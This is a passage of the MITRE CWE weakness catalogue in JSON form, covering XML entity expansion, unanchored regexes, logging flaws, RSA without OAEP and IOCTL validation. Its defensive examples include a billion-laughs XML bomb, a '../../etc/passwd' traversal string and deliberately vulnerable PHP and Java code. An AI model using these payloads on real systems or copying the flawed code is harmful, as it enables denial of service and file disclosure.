Expansion."},{"Term":"Billion Laughs Attack"},{"Term":"XML Bomb","Description":"While the \\"XML Bomb\\" term was used in the early years of knowledge of this issue, the XEE term seems to be more commonly used."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"If parsed, recursive entity references allow the attacker to expand data exponentially, quickly consuming all system resources."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities."},{"Phase":"Implementation","Description":"Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-53"},"Intro_Text":"The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected.","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\"?&gt;&lt;!DOCTYPE MaliciousDTD [&lt;!ENTITY ZERO \\"A\\"&gt;&lt;!ENTITY ONE \\"&amp;ZERO;&amp;ZERO;\\"&gt;&lt;!ENTITY TWO \\"&amp;ONE;&amp;ONE;\\"&gt;...&lt;!ENTITY THIRTYTWO \\"&amp;THIRTYONE;&amp;THIRTYONE;\\"&gt;]&gt;&lt;data&gt;&amp;THIRTYTWO;&lt;/data&gt;","xhtml:br":["","","","","","","",""]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3281","Description":"XEE in XML-parsing library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281"},{"Reference":"CVE-2011-3288","Description":"XML bomb / XEE in enterprise communication product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3288"},{"Reference":"CVE-2011-1755","Description":"\\"Billion laughs\\" attack in XMPP server daemon.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1755"},{"Reference":"CVE-2009-1955","Description":"XML bomb in web server module","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1955"},{"Reference":"CVE-2003-1564","Description":"Parsing library allows XML bomb","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1564"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":44,"Entry_Name":"XML Entity Expansion"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-676"}},{"attr":{"@_External_Reference_ID":"REF-677"}},{"attr":{"@_External_Reference_ID":"REF-678"}},{"attr":{"@_External_Reference_ID":"REF-679"}},{"attr":{"@_External_Reference_ID":"REF-680"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-682"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted Recursive Entity References in DTDs (\'XML Bomb\')","attr":{"@_Date":"2013-02-21"}}}},"777":{"attr":{"@_ID":"777","@_Name":"Regular Expression without Anchors","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through.","Extended_Description":"When performing tasks such as validating against a set of allowed inputs (allowlist), data is examined and possibly modified to ensure that it is well-formed and adheres to a list of safe values. If the regular expression is not anchored, malicious or malformed data may be included before or after any string matching the regular expression. The type of malicious data that is allowed will depend on the context of the application and which anchors are omitted from the regular expression.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"625","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"Regular expressions are typically used to match a pattern of text. Anchors are used in regular expressions to specify where the pattern should match: at the beginning, the end, or both (the whole input)."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Availability","Confidentiality","Access Control"],"Impact":"Bypass Protection Mechanism","Note":"An unanchored regular expression in the context of an allowlist will possibly result in a protection mechanism failure, allowing malicious or malformed data to enter trusted regions of the program. The specific consequences will depend on what functionality the allowlist was protecting."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Be sure to understand both what will be matched and what will not be matched by a regular expression. Anchoring the ends of the expression will allow the programmer to define an allowlist strictly limited to what is matched by the text in the regular expression. If you are using a package that only matches one line by default, ensure that you can match multi-line inputs if necessary."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a web application that supports multiple languages. It selects messages for an appropriate language by using the lang parameter.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = \\"/home/cwe/languages\\";$lang = $_GET[\'lang\'];if (preg_match(\\"/[A-Za-z0-9]+/\\", $lang)) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"include(\\"$dir/$lang\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"You shall not pass!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../etc/passwd"}],"Body_Text":["The previous code attempts to match only alphanumeric values so that language values such as \\"english\\" and \\"french\\" are valid while also protecting against path traversal, CWE-22. However, the regular expression anchors are omitted, so any text containing at least one alphanumeric character will now pass the validation step. For example, the attack string below will match the regular expression.","If the attacker can inject code sequences into a file, such as the web server\'s HTTP request log, then the attacker may be able to redirect the lang parameter to the log file and execute arbitrary code."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-06-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"}]}},"778":{"attr":{"@_ID":"778","@_Name":"Insufficient Logging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a security-critical event occurs, the software either does not record the event or omits important details about the event when logging it.","Extended_Description":"When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"223","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If security critical information is not recorded, there will be no trail for forensic analysis and discovering the cause of problems or the source of attacks may become more difficult or impossible."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a centralized logging mechanism that supports multiple levels of detail. Ensure that all security-related successes and failures can be logged."},{"Phase":"Operation","Description":"Be sure to set the level of logging appropriately in a production environment. Sufficient data should be logged to enable system administrators to detect attacks, diagnose errors, and recover from attacks. At the same time, logging too much data (CWE-779) can cause the same problems."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;system.serviceModel&gt;&lt;/system.serviceModel&gt;","xhtml:div":{"#text":"&lt;behaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceBehaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;behavior name=\\"NewBehavior\\"&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"None\\"messageAuthenticationAuditLevel=\\"None\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"&lt;system.serviceModel&gt;&lt;/system.serviceModel&gt;","xhtml:div":{"#text":"&lt;behaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceBehaviors&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;behavior name=\\"NewBehavior\\"&gt;...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;serviceSecurityAudit auditLogLocation=\\"Default\\"suppressAuditFailure=\\"false\\"serviceAuthorizationAuditLevel=\\"SuccessAndFailure\\"messageAuthenticationAuditLevel=\\"SuccessAndFailure\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":["",""]}}}}}],"Body_Text":["The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts.","Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4315","Description":"server does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4315"},{"Reference":"CVE-2008-1203","Description":"admin interface does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1203"},{"Reference":"CVE-2007-3730","Description":"default configuration for POP server does not log source IP or username for login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3730"},{"Reference":"CVE-2007-1225","Description":"proxy does not log requests without \\"http://\\" in the URL, allowing web surfers to access restricted web content without detection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1225"},{"Reference":"CVE-2003-1566","Description":"web server does not log requests for a non-standard request type","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1566"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Accountability&#34;, Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Fortify Software","Contribution_Date":"2009-07-02","Contribution_Comment":"Provided code example and additional information for description and consequences."}}},"779":{"attr":{"@_ID":"779","@_Name":"Logging of Excessive Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack.","Extended_Description":"While logging is a good practice in general, and very high levels of logging are appropriate for debugging stages of development, too much logging in a production environment might hinder a system administrator\'s ability to detect anomalous conditions. This can provide cover for an attacker while attempting to penetrate a system, clutter the audit trail for forensic analysis, or make it more difficult to debug problems in a production environment.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)"],"Note":"Log files can become so large that they consume excessive resources, such as disk and CPU, which can hinder the performance of the system."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Logging too much information can make the log files of less use to forensics analysts and developers when trying to diagnose a problem or recover from an attack."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If system administrators are unable to effectively process log files, attempted attacks may go undetected, possibly leading to eventual system compromise."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Suppress large numbers of duplicate log messages and replace them with periodic summaries. For example, syslog may include an entry that states \\"last message repeated X times\\" when recording repeated events."},{"Phase":"Architecture and Design","Description":"Support a maximum size for the log file that can be controlled by the administrator. If the maximum size is reached, the admin should be notified. Also, consider reducing functionality of the software. This may result in a denial-of-service to legitimate software users, but it will prevent the software from adversely impacting the entire system."},{"Phase":"Implementation","Description":"Adjust configurations appropriately when software is transitioned from a debug state to production."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0421","Description":"server records a large amount of data to the server log when it receives malformed headers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0421"},{"Reference":"CVE-2002-1154","Description":"chain: application does not restrict access to front-end for updates, which allows attacker to fill the error log","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"780":{"attr":{"@_ID":"780","@_Name":"Use of RSA Algorithm without OAEP","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.","Extended_Description":"Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Without OAEP in RSA encryption, it will take less work for an attacker to decrypt the data or to infer patterns from the ciphertext."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The example below attempts to build an RSA cipher.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/NONE/NoPadding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public Cipher getRSACipher() {}","xhtml:div":{"#text":"Cipher rsa = null;try {}catch (java.security.NoSuchAlgorithmException e) {}catch (javax.crypto.NoSuchPaddingException e) {}return rsa;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"rsa = javax.crypto.Cipher.getInstance(\\"RSA/ECB/OAEPWithMD5AndMGF1Padding\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log(\\"this should never happen\\", e);","attr":{"@_style":"margin-left:10px;"}}]}}}],"Body_Text":"While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-694"}},{"attr":{"@_External_Reference_ID":"REF-695"}}]},"Notes":{"Note":{"#text":"This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Organization":"Fortify Software","Submission_Date":"2009-07-08","Submission_Comment":"Based on information from Fortify Software."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"781":{"attr":{"@_ID":"781","@_Name":"Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided.","Extended_Description":"When an IOCTL uses the METHOD_NEITHER option for I/O control, it is the responsibility of the IOCTL to validate the addresses that have been supplied to it. If validation is missing or incorrect, attackers can supply arbitrary memory addresses, leading to code execution or a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"822","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":{"attr":{"@_Name":"Windows NT","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"An attacker may be able to access memory that belongs to another process or user. If the attacker can control the contents that the IOCTL writes, it may lead to code execution at high privilege levels. At the least, a crash can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If METHOD_NEITHER is required for the IOCTL, then ensure that all user-space addresses are properly validated before they are first accessed. The ProbeForRead and ProbeForWrite routines are available for this task. Also properly protect and manage the user-supplied buffers, since the I/O Manager does not do this when METHOD_NEITHER is being used. See References."},{"Phase":"Architecture and Design","Description":"If possible, avoid using METHOD_NEITHER in the IOCTL and select methods that effectively control the buffer size, such as METHOD_BUFFERED, METHOD_IN_DIRECT, or METHOD_OUT_DIRECT."},{"Phase":["Architecture and Design","Implementation"],"Description":"If the IOCTL is part of a driver that is only intended to be accessed by trusted users, then use proper access control for the associated device or device namespace. See References."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2373","Description":"Driver for file-sharing and messaging protocol allows attackers to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2373"},{"Reference":"CVE-2009-0686","Description":"Anti-virus product does not validate addresses, allowing attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0686"},{"Reference":"CVE-2009-0824","Description":"DVD software allows attackers to cause a crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0824"},{"Reference":"CVE-2008-5724","Description":"Personal firewall allows attackers to gain SYSTEM privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5724"},{"Reference":"CVE-2007-5756","Description":"chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-696"}},{"attr":{"@_External_Reference_ID":"REF-697"}},{"attr":{"@_External_Reference_ID":"REF-698"}},{"attr":{"@_External_Reference_ID":"REF-699"}},{"attr":{"@_External_Reference_ID":"REF-700"}},{"attr":{"@_External_Reference_ID":"REF-701"}},{"attr":{"@_External_Reference_ID":"REF-702"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["While this type of issue has been known since 2006, it is probably still under-studied and under-reported. Most of the focus has been on high-profile software and security products, but other kinds of system software also use drivers. Since exploitation requires the development of custom code, it requires some skill to find this weakness.","Because exploitation typically requires local privileges, it might not be a priority for active attackers. However, remote exploitation may be possible for software such as device drivers. Even when remote vectors are not available, it may be useful as the final privilege-escalation step in multi-stage remote attacks against application-layer software, or as the primary attack by a local user on a multi-user system."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"782":{"attr":{"@_ID":"782","@_Name":"Exposed IOCTL with Insufficient Access Control","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL.","Extended_Description":{"xhtml:p":["When an IOCTL contains privileged functionality and is exposed unnecessarily, attackers may be able to access this functionality by invoking the IOCTL. Even if the functionality is benign, if the programmer has assumed that the IOCTL would only be accessed by a trusted process, there may be little or no validation of the incoming data, exposing weaknesses that would never be reachable if the attacker cannot call the IOCTL directly.","The implementations of IOCTLs will differ between operating system types and versions, so the methods of attack and prevention may vary widely."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"781","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}],"Operating_System":[{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Note":"Attackers can invoke any functionality that the IOCTL offers. Depending on the functionality, the consequences may include code execution, denial-of-service, and theft of data."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In Windows environments, use proper access control for the associated device or device namespace. See References."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2208","Description":"Operating system does not enforce permissions on an IOCTL that can be used to modify network settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2208"},{"Reference":"CVE-2008-3831","Description":"Device driver does not restrict ioctl calls to its direct rendering manager.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831"},{"Reference":"CVE-2008-3525","Description":"ioctl does not check for a required capability before processing certain requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3525"},{"Reference":"CVE-2008-0322","Description":"Chain: insecure device permissions allows access to an IOCTL, allowing arbitrary memory to be overwritten.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2007-4277","Description":"Chain: anti-virus product uses weak permissions for a device, leading to resultant buffer overflow in an exposed IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4277"},{"Reference":"CVE-2007-1400","Description":"Chain: sandbox allows opening of a TTY device, enabling shell commands through an exposed ioctl.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1400"},{"Reference":"CVE-2006-4926","Description":"Anti-virus product uses insecure security descriptor for a device driver, allowing access to a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4926"},{"Reference":"CVE-1999-0728","Description":"Unauthorized user can disable keyboard or mouse by directly invoking a privileged IOCTL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0728"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-701"}}},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses when the programmer assumes that the IOCTL can only be accessed by trusted parties. For example, a program or driver might not validate incoming addresses in METHOD_NEITHER IOCTLs in Windows environments (CWE-781), which could allow buffer overflow and similar attacks to take place, even when the attacker never should have been able to access the IOCTL at all.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content 